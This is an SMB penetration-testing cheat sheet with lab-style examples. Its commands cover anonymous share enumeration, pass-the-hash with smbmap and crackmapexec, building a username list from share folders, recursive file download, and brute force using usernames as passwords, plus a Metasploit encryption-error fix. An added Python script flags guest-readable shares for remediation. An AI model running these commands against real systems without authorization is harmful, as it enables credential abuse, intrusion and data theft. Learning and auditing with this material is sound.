SMB - (ports 139, 445)

Share listing

Recommended commands for listing shares as the anonymous user, with valid credentials, and using the pass-the-hash technique.

$ smbmap -H 10.10.10.111
[+] Guest session       IP: 10.11.1.231:445     Name: 10.11.1.231                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        home                                                    READ ONLY       Home
        docs                                                    READ ONLY       docs
        tmp                                                     READ ONLY       TMP
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.2.10-Debian)
$ smbclient \\\\10.10.10.111\\home
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Dec 27 23:20:35 2015
  ..                                  D        0  Sun Dec 27 23:09:11 2015
  folder08                              D        0  Fri Jan  2 06:13:55 2015
  folder02                              D        0  Fri Jan  2 07:44:26 2015

$ smbclient --no-pass -L //10.10.10.111
$ smbmap -u invalid -H 10.10.10.111
[+] Guest session       IP: 10.10.10.111:445    Name: BLACKFIELD.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
smbclient -U invalid //10.10.10.111/profiles\$
smbmap -H 192.168.0.1 [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H 192.168.0.1 [-P <PORT>] #Creds
smbmap -u "username" -p "<LM>:<NT>" -H 192.168.0.1 [-P <PORT>] #Pass-the-Hash (smbmap expects LM:NT)
crackmapexec smb 192.168.0.1 -u '' -p '' --shares #Null user
crackmapexec smb 192.168.0.1 -u 'username' -p 'password' --shares #Creds
crackmapexec smb 192.168.0.1 -u 'username' -H '<HASH>' --shares #Pass-the-Hash
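The listings above are what an auditor usually has to turn into findings: which shares does a host expose to a guest or null session? The following Python script is an added example (not part of this cheat sheet and not code from smbmap) that parses the smbmap share table shown above and flags every share a guest session can read or write. The two samples are copied from the listings above and are labelled as constructed input; the regular expressions assume smbmap's tabular output with one of its four permission strings per line, and share names containing spaces are not handled.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed samples in the smbmap output format shown above. The host
# details are the cheat sheet's own placeholders, not a real environment.
SAMPLE_WINDOWS = """\
[+] Guest session       IP: 10.10.10.111:445    Name: BLACKFIELD.local
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share
"""

SAMPLE_SAMBA = """\
[+] Guest session       IP: 10.11.1.231:445     Name: 10.11.1.231
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        home                                                    READ ONLY       Home
        docs                                                    READ ONLY       docs
        tmp                                                     READ ONLY       TMP
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.2.10-Debian)
"""

# Header line: "[+] Guest session  IP: host:port  Name: name" (session word is
# absent when smbmap ran with credentials).
HEADER_RE = re.compile(
    r"\[\+\]\s+(?:(?P<session>\w+) session\s+)?IP:\s*(?P<ip>\S+)\s+Name:\s*(?P<name>\S+)"
)
# Share rows: indented name, one of smbmap's permission strings, optional comment.
SHARE_RE = re.compile(
    r"^\s+(?P<share>\S+)\s+(?P<perm>NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(?P<comment>.*)$"
)

@dataclass
class Share:
    host: str
    session: str
    name: str
    perm: str
    comment: str

def parse_smbmap(text: str) -> List[Share]:
    """Turn an smbmap listing into Share records, tracking which host and
    session type each row belongs to."""
    shares: List[Share] = []
    host, session = "?", "authenticated"
    for line in text.splitlines():
        m = HEADER_RE.search(line)
        if m:
            host = m.group("ip")
            session = (m.group("session") or "authenticated").lower()
            continue
        m = SHARE_RE.match(line)
        if m:
            shares.append(Share(host, session, m.group("share"),
                                m.group("perm"), m.group("comment").strip()))
    return shares

# IPC$ is reachable by any session that can negotiate at all, so a readable
# IPC$ is expected and is not a finding on its own.
EXPECTED_IPC = {"IPC$"}

def exposed_shares(shares: List[Share]) -> List[Share]:
    """Shares that a guest (unauthenticated) session can read or write."""
    return [s for s in shares
            if s.session == "guest" and s.perm != "NO ACCESS"
            and s.name not in EXPECTED_IPC]

def report(text: str) -> List[str]:
    """One finding line per exposed share."""
    return [f"{s.host}: share '{s.name}' is {s.perm} for a {s.session} session "
            f"({s.comment or 'no comment'})"
            for s in exposed_shares(parse_smbmap(text))]

if __name__ == "__main__":
    for sample in (SAMPLE_WINDOWS, SAMPLE_SAMBA):
        for line in report(sample):
            print(line)
```

Run against the Samba listing it reports home, docs and tmp; against the Windows listing only profiles$, since IPC$ is filtered out as expected behaviour. Feeding it real smbmap output gives a quick list of anonymous exposure to remediate (disable guest access, or fix the share ACLs).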

nmap -p445 --script 'smb-vuln-*' <IP> # Known SMB vulnerability checks (NSE scripts); quote the glob so the shell does not expand it

# Check the SMB version
crackmapexec smb 10.10.10.111

# Build a username dictionary from the SMB folder names
smbclient -U invalid%invalid //10.10.10.111/profiles\$ -c ls | awk '{print $1}' > users.txt

# Filter by file extension with a recursive search
smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -A '(xlsx|docx|txt|xml)' -R

# Get the SMB version
./smbver.sh 10.10.10.111 139
10.10.10.111: UnixSamba 227a

Recursive download of files and folders from SMB

smb: \> prompt off
smb: \> recurse on
smb: \> mget *

Brute force using the username as the password

crackmapexec smb 10.10.10.111 -u users.txt -p users.txt --continue-on-success

Fixing a Metasploit error

[-] 172.20.8.130:445 - Exploit failed: RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.
[*] Exploit completed, but no session was created.

## Solution
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1
